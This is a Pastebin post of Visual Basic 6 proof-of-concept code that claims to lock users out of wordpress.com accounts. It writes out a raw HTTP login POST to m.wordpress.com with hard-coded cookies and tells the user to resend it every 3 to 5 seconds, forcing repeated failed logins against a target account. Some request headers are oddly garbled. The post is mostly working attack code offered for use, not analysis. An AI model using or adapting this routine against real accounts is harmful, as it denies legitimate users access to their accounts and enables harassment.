BrU32

VB6 Wordpress Lockout Example POC SRC (Older) 2007-2008ish..

Aug 1st, 2016
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.51 KB | None | 0 0
  1. Wordpress Lock Out
  2.  
  3. Coded By BrÜ
  4.  
  5.  
  6. This is a working method to lock out wordpress.com accounts.
  7.  
  8.  
  9. Step1. Connect to m.wordpress.com:
  10.  
  11. On Error Resume Next
  12. Client.Disconnect()
  13. Client.Connect("m.wordpress.com", 80)
  14.  
  15.  
  16. Step2. Connection Packet Data:
  17.  
  18. On Error Resume Next
  19. 'Authentication Packet.
  20. Dim Lenn As Double
  21. Lenn = Len("log=" & TextBox6.Text & "&pwd=" & TextBox7.Text & "&submit=Login+%C2%BB&redirect_to=http%3A%2F%2Fm.wordpress.com%2F")
  22. Client.SendData (Client.StringToBytes("POST / HTTP/1.1" & vbCrLf))
  23. Client.SendData (Client.StringToBytes("Host: m.wordpress.com" & vbCrLf))
  24. Client.SendData (Client.StringToBytes("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" & vbCrLf))
  25. Client.SendData (Client.StringToBytes("Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" & vbCrLf))
  26. Client.SendData (Client.StringToBytes("Accept-Language: en-us,en;q=0.5" & vbCrLf))
  27. Client.SendData (Client.StringToBytes("Accept(-Encoding) : gzip(, deflate" & vbCrLf))
  28. Client.SendData (Client.StringToBytes("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" & vbCrLf))
  29. Client.SendData (Client.StringToBytes("Keep-Alive: 300" & vbCrLf))
  30. Client.SendData (Client.StringToBytes("Connection: keep(-alive)" & vbCrLf))
  31. Client.SendData (Client.StringToBytes("Referer: http://m.wordpress.com/" & vbCrLf))
  32. Client.SendData (Client.StringToBytes("Cookie: __utma=11735858.4590759185424364000.1234752465.1234752465.1234752465.1; __utmb=11735858.2.10.1234752465; __utmc=11735858; __utmz=11735858.1234752465.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=4998cfd8-106ab-765e3-51bd8; __qcb=686240527; wordpress_test_cookie=WP+Cookie+check; ref=typo; cookietest=1" & vbCrLf))
  33. Client.SendData (Client.StringToBytes("Content-Type: application/x-www-form-urlencoded" & vbCrLf))
  34. Client.SendData (Client.StringToBytes("Content-Length: " & Lenn & vbCrLf & vbCrLf))
  35. Client.SendData (Client.StringToBytes("log=" & TextBox6.Text & "&pwd=" & TextBox7.Text & "&submit=Login+%C2%BB&redirect_to=http%3A%2F%2Fm.wordpress.com%2FHTTP"))
  36.  
  37.  
  38. Step3. Reconnect and resend connection packet data every 3 to 5 seconds.
Advertisement
Add Comment
Please, Sign In to add comment